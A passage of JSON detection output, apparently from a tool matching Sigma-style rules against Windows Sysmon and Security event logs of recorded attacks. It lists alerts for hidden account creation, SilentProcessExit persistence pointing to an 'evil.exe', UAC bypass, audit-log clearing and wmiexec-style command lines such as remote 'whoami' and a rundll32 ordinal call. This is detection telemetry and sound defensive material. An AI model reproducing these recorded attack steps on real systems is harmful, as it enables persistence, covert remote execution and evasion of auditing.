09:28:22.279"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134365,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6528}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-04T09:28:22.280355Z"}},"Version":2}}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or 
Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 10:03:04.489"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134385,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6528}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-04T10:03:04.489480Z"}},"Version":2}}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\sqlsvc\\(Default)","UtcTime":"2020-09-04 10:33:31.842"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134399,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6528}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-04T10:33:31.843489Z"}},"Version":2}}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 10:54:22.973"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134408,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6528}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-04T10:54:22.974353Z"}},"Version":2}}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 11:00:24.601"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134411,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6528}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-04T11:00:24.602530Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Registry Persistence 
Mechanisms"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000200)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F5D-5D0A-0000-00109B331300","ProcessId":1356,"RuleName":"","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\\GlobalFlag","UtcTime":"2019-06-19 17:22:41.709"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8034,"Execution":{"#attributes":{"ProcessID":284,"ThreadID":2076}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-19T17:22:41.709638Z"}},"Version":2}}}},{"detection":["Registry Persistence Mechanisms"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F61-5D0A-0000-0010DB351300","ProcessId":2504,"RuleName":"Persistence via SilentProcessExit hijack","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\\ReportingMode","UtcTime":"2019-06-19 
17:22:43.912"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8036,"Execution":{"#attributes":{"ProcessID":284,"ThreadID":2076}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-19T17:22:43.944013Z"}},"Version":2}}}},{"detection":["Registry Persistence Mechanisms"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\temp\\evil.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F63-5D0A-0000-0010F93A1300","ProcessId":1956,"RuleName":"Persistence via SilentProcessExit hijack","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\\MonitorProcess","UtcTime":"2019-06-19 17:22:45.678"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8038,"Execution":{"#attributes":{"ProcessID":284,"ThreadID":2076}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-19T17:22:45.694013Z"}},"Version":2}}}},{"detection":["WMI Event Consumer Created Named Pipe","WMI Persistence - Script Event Consumer File Write","WMI Persistence - Script Event Consumer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\scrcons.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI 
Standard Event Consumer - scripting","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=6AEC20B9D4C1AB6F1AB297F28EB6BF93,IMPHASH=CCEC86CC0D16062391CC627BC9466A62","Image":"C:\\Windows\\System32\\wbem\\scrcons.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-701F-5CA5-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-7020-5CA5-0000-0010ED6A0000","ParentProcessId":596,"ProcessGuid":"365ABB72-F76F-5CA4-0000-0010AA201700","ProcessId":2636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-03 18:11:59.996"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":7203,"Execution":{"#attributes":{"ProcessID":1828,"ThreadID":372}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-03T18:12:00.016862Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\programdata\\StartupNewHomeAddress","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-BFB2-5CED-0000-0010F2C03600","ProcessId":1520,"RuleName":"Persistence - Startup User Shell Folder Modified","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\startup","UtcTime":"2019-05-28 
23:09:38.589"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":6625,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2420}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-28T23:09:38.589832Z"}},"Version":2}}}},{"detection":["Usage of Sysinternals Tools","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\PsExec64.exe","ProcessGuid":"747F3D96-53D8-5D75-0000-00101811CD00","ProcessId":6868,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Sysinternals\\PsExec\\EulaAccepted","UtcTime":"2019-09-08 19:17:44.203"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38292,"Execution":{"#attributes":{"ProcessID":2956,"ThreadID":2088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-09-08T19:17:44.249169Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD 
(0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-64F9-5D75-0000-001038560000","ProcessId":576,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PSEXESVC\\Start","UtcTime":"2019-09-08 19:17:44.296"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38294,"Execution":{"#attributes":{"ProcessID":2956,"ThreadID":2088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-09-08T19:17:44.350762Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"%%SystemRoot%%\\PSEXESVC.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-64F9-5D75-0000-001038560000","ProcessId":576,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PSEXESVC\\ImagePath","UtcTime":"2019-09-08 19:17:44.296"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38295,"Execution":{"#attributes":{"ProcessID":2956,"ThreadID":2088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-09-08T19:17:44.391389Z"}},"Version":2}}}},{"detection":["Remote PowerShell Session Host Process 
(WinRM)"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\administrator\\Documents\\","Description":"Hostname APP","FileVersion":"6.3.9600.16384 (winblue_rtm.130821-1623)","Hashes":"SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","IntegrityLevel":"High","LogonGuid":"DFAE8213-BEAD-5CDC-0000-0020AFDA1500","LogonId":"0x15daaf","ParentCommandLine":"C:\\Windows\\system32\\wsmprovhost.exe -Embedding","ParentImage":"C:\\Windows\\System32\\wsmprovhost.exe","ParentProcessGuid":"DFAE8213-BEAD-5CDC-0000-0010DDDB1500","ParentProcessId":3332,"ProcessGuid":"DFAE8213-BF0B-5CDC-0000-00105A951600","ProcessId":2936,"Product":"Microsoft® Windows® Operating System","RuleName":"Lateral Movement - Windows Remote Management","TerminalSessionId":0,"User":"insecurebank\\Administrator","UtcTime":"2019-05-16 01:38:19.616"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1,"EventRecordID":18002,"Execution":{"#attributes":{"ProcessID":1792,"ThreadID":2232}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-16T01:38:19.630865Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":566821,"Execution":{"#attributes":{"ProcessID":780,"ThreadID":3480}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T00:02:00.383090Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x4fd77","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"}}}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe /Q /c c:\\windows\\system32\\rundll32.exe c:\\programdata\\7okjer,#1 1> \\\\127.0.0.1\\C$\\WqEVwJZYOe 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-75D0-5F8B-0000-0020A8A83300","LogonId":"0x33a8a8","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-75D1-5F8B-0000-00101DAB3300","ParentProcessId":2228,"ProcessGuid":"747F3D96-75D1-5F8B-0000-001088C23300","ProcessId":2784,"Product":"Microsoft® Windows® 
Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\Administrator","UtcTime":"2020-10-17 22:53:05.776"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":421227,"Execution":{"#attributes":{"ProcessID":3236,"ThreadID":4832}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T22:53:05.777453Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-12-09 22:45:33.087","Image":"System","ProcessGuid":"747F3D96-CDE2-5FD1-0000-0010EB030000","ProcessId":4,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\onedrive.exe","UtcTime":"2020-12-09 22:45:33.087"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":549541,"Execution":{"#attributes":{"ProcessID":3428,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-12-09T22:45:33.090853Z"}},"Version":2}}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":2171289,"Execution":{"#attributes":{"ProcessID":420,"ThreadID":996}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-02T11:47:39.499106Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"3B","SubjectLogonId":"0x38a14","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"}}}}},{"detection":["Whoami Execution Anomaly"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B0F2-5CC8-0000-00203D311D00","LogonId":"0x1d313d","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"365ABB72-B0C0-5CC8-0000-001017C31C00","ParentProcessId":836,"ProcessGuid":"365ABB72-B0F3-5CC8-0000-0010C43A1D00","ProcessId":2828,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:32:51.324"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9828,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:32:51.324839Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami /all ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B0F2-5CC8-0000-00203D311D00","LogonId":"0x1d313d","ParentCommandLine":"cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-B0F3-5CC8-0000-0010C43A1D00","ParentProcessId":2828,"ProcessGuid":"365ABB72-B0F3-5CC8-0000-0010373E1D00","ProcessId":3328,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 
20:32:51.356"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9829,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:32:51.371714Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-2910-5F86-0000-00109EA10100","ProcessId":2892,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Shares\\staging","UtcTime":"2020-10-13 23:06:02.878"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":415266,"Execution":{"#attributes":{"ProcessID":3336,"ThreadID":4516}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-13T23:06:02.889794Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-2910-5F86-0000-00109EA10100","ProcessId":2892,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Shares\\Security\\staging","UtcTime":"2020-10-13 
23:06:02.878"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":415268,"Execution":{"#attributes":{"ProcessID":3336,"ThreadID":4516}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-13T23:06:02.889886Z"}},"Version":2}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":433307,"Execution":{"#attributes":{"ProcessID":856,"ThreadID":1660}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-18T11:27:00.438449Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x18a7875","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106"}}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 
